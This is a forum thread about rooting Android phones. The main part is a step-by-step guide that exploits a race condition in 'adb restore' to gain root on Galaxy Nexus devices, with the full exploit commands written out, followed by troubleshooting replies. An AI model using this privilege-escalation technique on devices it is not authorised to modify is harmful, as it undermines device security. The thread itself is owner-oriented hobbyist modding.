Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining
Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version ( i belive v5???) and root a different way??
Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!

jlear3 said:
Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining
Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version ( i belive v5???) and root a different way??
Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!
Click to expand...
Click to collapse
The update is not being pushed, because the OTA mechanism doesn't work on the OV. You have to go to the VM website and download the update from the phone FAQ.
The only advantage is a new radio, which give slightly improved performance.

Thank you very much!
I installed the update to my (unmodded) backup phone without thinking about whether or not I'd be able to root the handset after applying it. DOH!
I have just been using this phone as a WiFi device so far. I have run the battery down and recharged it once and installed a few apps on it. So I will run it down, recharge it again and then do a factory reset before I try rooting it just to make sure that I don't hose it.

It's a good idea to check all the steps before you start ...
Finally ran my battery down for the second time. So, I recharged, ran a factory re-set and ran the shell script on my Linux box to root the phone.
Oops!
The file VM670NH_recovery.img downloaded as VM670NH_recovery.bin and the system can't find/stat it! Hit ^C and bailed!
Hoping, hoping, hoping ...
Good! It's not bricked!
Renamed the recovery file, re-ran the script. Success!!
Rebooted into recovery, flashed rootme.zip
==> Did a nandroid backup.
Downloaded root check basic app and confirmed that it has worked.
So, for other modders trying this out:
Check your files and file names before you start! When I looked at Gordita.sh the first time I found that what I had downloaded was an HTML file with the script embedded in it. Copied and pasted from the OP and then checked again to make sure I had the right content.
Of course if you are running the adb commands manually then this won't happen to you.
But, as I noted above, I didn't cross-check that the recovery file that the script would be looking for had the right file name extension (.img, not .bin), so don't be me.
That said, jcase: Thank You Very Much!! Not only for developing this root exploit but also for making one that is robust enough for someone like me to goober it up and still come out unburnt!

After all of this , can you make it a hotspot in quick settings?

The setting dialog is there ..
H0daddy said:
After all of this , can you make it a hotspot in quick settings?
Click to expand...
Click to collapse
Once I rooted my phone I installed a modified ROM. And then another one, and then ...
I saw your question a bit ago and since I no longer had the stock ROM installed (and had never used Quick Settings to enable the hotspot feature before) I didn't know. I still don't. Here is the story on that ...
I just restored the ZV9 ROM from backup today and then installed the Quick Settings app. I can say that the app still has the option to enable the hotspot available and that it tries to set it up. However the phone I am using hasn't been activated yet and the 3G network isn't provisioned on it. So all I get is a message saying the network isn't available.
So, it looks somewhat promising. Maybe someone who has an activated phone with the ZV9 ROM can test it out and let you know.
And if I activate this phone before you get a useful reply I'll test it to see if it works.

So happy to see this

Please assist
Got up to step adb shell "chmod 755 /data/local/flash_image"
But got back "no such file."

CWM
Got up to CWM but it won't let me select install zip from sd card. Any suggestions?

knicks791 said:
Got up to CWM but it won't let me select install zip from sd card. Any suggestions?
Click to expand...
Click to collapse
so you have bobz recovery installed?... i assume youve tried rebooting to recovery form the powered off state via the key combo (HOLD home+vol down+power, RELEASE after the LG logo), and tried instal zip from sd again?...
try:
http://forums.projectopencannibal.net/beta-releases-11/lg-optimus-v-v2-1dev1-(10-09-2012)/
http://forums.projectopencannibal.n...1-universal-installer-for-lg-optimus-devices/

[HOW-TO] [GSM & CDMA] How to root without unlocking bootloader (for ITL41D to JRO03O)

[HOW-TO] [GSM & CDMA] How to root without unlocking bootloader (for ITL41D to JRO03O)
As of Oct 10, 2012: Google has patched this vulnerability starting with JRO03U. That is to say, this works on versions of ICS and JB from ITL41D to JRO03O inclusive. It will not work for JRO03U or newer. (My previous guide found here only worked on Android versions 4.0.1 and 4.0.2, i.e., ITL41D/F and ICL53F.
Once you have root, you can use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!
Disclaimer: I take no credit for this exploit or the implementation of it. All credit goes to Bin4ry and his team. I just isolated the parts required for the GNex, modified it slightly and eliminated the script.
So, it looks like Bin4ry (with the help of a couple of others) has managed to find a way to exploit a timing difference in the "adb restore" command. See source here. (Although this may be old news to some, I hadn't seen it before a few days ago.) This is more for informational purposes, as having a Nexus device, we are able to backup our data, unlock the bootloader and restore the backup, so this is guide is not really that useful for most, but you still have those users who are scared to unlock their bootloader. It is useful however, for those with a broken power button, as it allows them to unlock their bootloader without the power button.
How this works
The way this works is as follows: the "adb restore" command needs to be able to write to /data to restore a backup. Because of this, we can find a way to write something to /data while this is being done. Now, Android parses a file called /data/local.prop on boot. If the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. So, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.
So what does this all mean:
You can now root any version of ICS and JB released to-date without having to unlock your bootloader (and without losing your data).
Moreover, you should now be able to root your device even if your hardware buttons are not working.
Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.
Notes:
1) Please read the entire post before attempting this.
2) This does not wipe any of your data, but I take no responsibility if something happens and you lose your data. Maybe consider doing a backup as per this thread before attempting this.
3) This assumes that you have USB Debugging enable on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
4) This obviously needs to be done over ADB, as you cannot run adb in a terminal emulator on-device. If you do not have ADB, I've attached it in the zip (Windows and Linux versions). Unzip all files.
Step-by-step:
1) Download the attached files to your computer and unzip them;
2) Open a command prompt in that same directory;
3) Copy the root files to your device:
adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk
4) Restore the fake "backup": adb restore fakebackup.ab Note: do not click restore on your device. Just enter the command into the command prompt on your PC and press the enter key.
5) Run the "exploit": adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" Note: when you enter this command, you should see your adb window flooded with errors -- this is what is supposed to happen.
6) Now that the "exploit" is running, click restore on your device.
7) Once it finishes, reboot your device: adb reboot Note: Do not try and use your device when it reboots. Running this exploit will reboot your device into emulator mode, so it will be laggy and the screen will flicker -- this is normal.
8) Once it is rebooted, open a shell: adb shell
Note: Once you do step 8, your should have a root shell, i.e., your prompt should be #, not $. If not, it did not work. Start again from step 4. (It may take a few tries for it to work. Thanks segv11.)
Now we can copy su and Superuser.apk to the correct spots to give us root.
9) Mount the system partition as r/w: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
10) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
11) Change permissions on su: chmod 06755 /system/bin/su
12) Symlink su to /xbin/su: ln -s /system/bin/su /system/xbin/su
13) Copy Superuser.apk to /system: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
14) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
15) Delete the file that the exploit created: rm /data/local.prop
16) Exit the ADB shell: exit (May have to type exit twice to get back to your command prompt.)
17) Type the following (not sure if this is needed for the GNex, but it shouldn't matter): adb shell "sync; sync; sync;"
18) Reboot: adb reboot
19) Done. You now should have root without having to unlock your bootloader. If you want to unlock now, you can without wiping anything. See segv11's app linked at the beginning of this post.
Note: If you still do not have root access after doing these steps, redo them and add this step between 10 and 11:
10b) Change the owner of su: chown 0.0 /system/bin/su (Thanks maxrfon.)

I've done all. It installs supersuser app but the phone is not really rooted and apps that requires it doesn't work

Lorenzo_9 said:
I've done all. It installs supersuser app but the phone is not really rooted and apps that requires it doesn't work
Click to expand...
Click to collapse
Did you try opening the Superuser app?
What happens when you open an app that requires root? Do you get the request for su access?

You can open the app but whith apps that requires root there are no requestes and they don't... Even using root checker you see that you're not rooted

Lorenzo_9 said:
You can open the app but whith apps that requires root there are no requestes and they don't... Even using root checker you see that you're not rooted
Click to expand...
Click to collapse
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.

efrant said:
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.
Click to expand...
Click to collapse
Ok I'll do it and then I'll report you what happens. So now have you updated su and superuser.apk?

Lorenzo_9 said:
Ok I'll do it and then I'll report you what happens. So now have you updated su and superuser.apk?
Click to expand...
Click to collapse
Yes, I put the latest versions in the zip in the first post.

I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.
Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.

serty4011 said:
I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.
Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.
Click to expand...
Click to collapse
Thanks for confirming that step was not needed.

Thanks!
Bookmarked for future reference :good:

does it work on nexus 7 ?

dacc said:
does it work on nexus 7 ?
Click to expand...
Click to collapse
Yes, it should.

thans for quick response

Works fine for my GNex, big thanks! How about putting it into a script for non-advanced users here?

wictor1992 said:
Works fine for my GNex, big thanks! How about putting it into a script for non-advanced users here?
Click to expand...
Click to collapse
Glad you got it working!
As for putting it into a script, I could but I'd rather not. As with most of the guides that I have written up, I purposely do not put things into a script so that people would actually go through all the steps and, by doing so, maybe get an understanding of what they are actually doing, and hopefully learn something in the process. If I would have packaged it up into a script, a lot of the less experienced users would not even try to go through the steps -- they would just use the script, and no one learns anything yet again. See here for some discussion on one-click scripts. Granted, blindly following a step-by-step is not much better, but I have tried to put comments and explanations throughout to facilitate learning. It's about the journey...
P.S.: I would appreciate it if no one else posts a script in this thread.

efrant said:
P.S.: I would appreciate it if no one else posts a script in this thread.
Click to expand...
Click to collapse
can i make a script that just puts in big text "STOP USING TOOLKITS AND 1 CLICKS"

Zepius said:
can i make a script that just puts in big text "STOP USING TOOLKITS AND 1 CLICKS"
Click to expand...
Click to collapse
LOL! Yes, sure, that's one script I don't mind being posted. LOL!

Heh, fair enough. I think I'm learning a bit about adb
One question: I can't replace system APKs by installing them, it tells me that there is a signature conflict. How can I fix that? I thought it shouldn't happen after rooting. (I'm trying to install the "international" velvet.apk).

wictor1992 said:
Heh, fair enough. I think I'm learning a bit about adb
One question: I can't replace system APKs by installing them, it tells me that there is a signature conflict. How can I fix that? I thought it shouldn't happen after rooting. (I'm trying to install the "international" velvet.apk).
Click to expand...
Click to collapse
Let's try to keep this thread on-topic please.
But to answer your question, don't install the apk. Using a file explorer that has root access, copy it to /system/app (after making sure that system is r/w) and make sure the permissions are set to match the other apks in that directory.

when running adb after running the command where i tell it to restore fake restore and then while the "exploit" is running ikeep getting , in cmd, link failed, no such file or directory, and it just keep doing that. is this normal or did i do something wrong.
efrant said:
Let's try to keep this thread on-topic please.
But to answer your question, don't install the apk. Using a file explorer that has root access, copy it to /system/app (after making sure that system is r/w) and make sure the permissions are set to match the other apks in that directory.
Click to expand...
Click to collapse